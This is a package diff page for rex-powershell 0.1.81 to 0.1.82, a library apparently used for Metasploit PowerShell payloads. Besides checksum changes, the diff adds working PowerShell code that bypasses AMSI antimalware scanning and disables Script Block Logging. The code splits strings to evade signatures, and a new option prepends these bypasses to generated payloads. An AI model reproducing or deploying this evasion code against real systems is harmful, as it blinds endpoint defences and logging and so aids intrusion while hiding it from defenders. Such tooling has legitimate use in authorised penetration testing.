rex-powershell 0.1.81 → 0.1.82
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/templates/to_mem_msil.ps1.template +1 -1
- data/lib/rex/powershell/command.rb +4 -0
- data/lib/rex/powershell/psh_methods.rb +47 -0
- data/lib/rex/powershell/version.rb +1 -1
- metadata +1 -1
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA1:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 5050ad40885d40a43ab8756d73c94880b17d7666
|
|
4
|
+
data.tar.gz: 9a4d35a597ab6a991f2be28a403d216e733a124e
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 03c15cfbddd8dc75c2f55e411285798911c9f286c50288412b1a51971036056f311c89e1099be7ea1dd4607139479099e7dd56e181fe6ee0de82ff158cec447a
|
|
7
|
+
data.tar.gz: 9dd8103e33b749ef55907ae5cc216e12814352480713056ea2fac2befbcd6630ddd096cd0cb3e18a0b6825c4bb6e8861a1566be2de1c2ce1757544781bdd2f78
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
|
@@ -316,6 +316,10 @@ EOS
|
|
|
316
316
|
end
|
|
317
317
|
end
|
|
318
318
|
|
|
319
|
+
if opts[:prepend_protections_bypass]
|
|
320
|
+
psh_payload = Rex::Powershell::PshMethods.bypass_powershell_protections << ";#{psh_payload}"
|
|
321
|
+
end
|
|
322
|
+
|
|
319
323
|
compressed_payload = compress_script(psh_payload, nil, opts)
|
|
320
324
|
encoded_payload = encode_script(psh_payload, opts)
|
|
321
325
|
|
|
@@ -85,6 +85,53 @@ module Powershell
|
|
|
85
85
|
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
|
86
86
|
end
|
|
87
87
|
|
|
88
|
+
#
|
|
89
|
+
# Return mattifestation's AMSI bypass
|
|
90
|
+
#
|
|
91
|
+
# @return [String] PowerShell code to bypass AMSI
|
|
92
|
+
def self.bypass_amsi()
|
|
93
|
+
%q{
|
|
94
|
+
$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
|
|
95
|
+
$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
|
|
96
|
+
}
|
|
97
|
+
end
|
|
98
|
+
|
|
99
|
+
#
|
|
100
|
+
# Return cobbr's Script Block Logging bypass
|
|
101
|
+
#
|
|
102
|
+
# @return [String] PowerShell code to bypass Script Block Logging
|
|
103
|
+
def self.bypass_script_log()
|
|
104
|
+
%q{
|
|
105
|
+
$GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
|
|
106
|
+
If($GPF){
|
|
107
|
+
$GPC=$GPF.GetValue($null);
|
|
108
|
+
If($GPC['ScriptB'+'lockLogging']){
|
|
109
|
+
$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
|
|
110
|
+
$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
|
|
111
|
+
}
|
|
112
|
+
$val=[Collections.Generic.Dictionary[string,System.Object]]::new();
|
|
113
|
+
$val.Add('EnableScriptB'+'lockLogging',0);
|
|
114
|
+
$val.Add('EnableScriptB'+'lockInvocationLogging',0);
|
|
115
|
+
$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
|
|
116
|
+
} Else {
|
|
117
|
+
[ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
|
|
118
|
+
}
|
|
119
|
+
}
|
|
120
|
+
end
|
|
121
|
+
|
|
122
|
+
#
|
|
123
|
+
# Return all bypasses checking if PowerShell version > 3
|
|
124
|
+
#
|
|
125
|
+
# @return [String] PowerShell code to disable PowerShell Built-In Protections
|
|
126
|
+
def self.bypass_powershell_protections()
|
|
127
|
+
%Q{
|
|
128
|
+
If($PSVersionTable.PSVersion.Major -ge 3){
|
|
129
|
+
#{self.bypass_script_log}
|
|
130
|
+
#{self.bypass_amsi}
|
|
131
|
+
}
|
|
132
|
+
}
|
|
133
|
+
end
|
|
134
|
+
|
|
88
135
|
#
|
|
89
136
|
# Download and execute string via HTTP
|
|
90
137
|
#
|
metadata
CHANGED
metadata.gz.sig
CHANGED
|
Binary file
|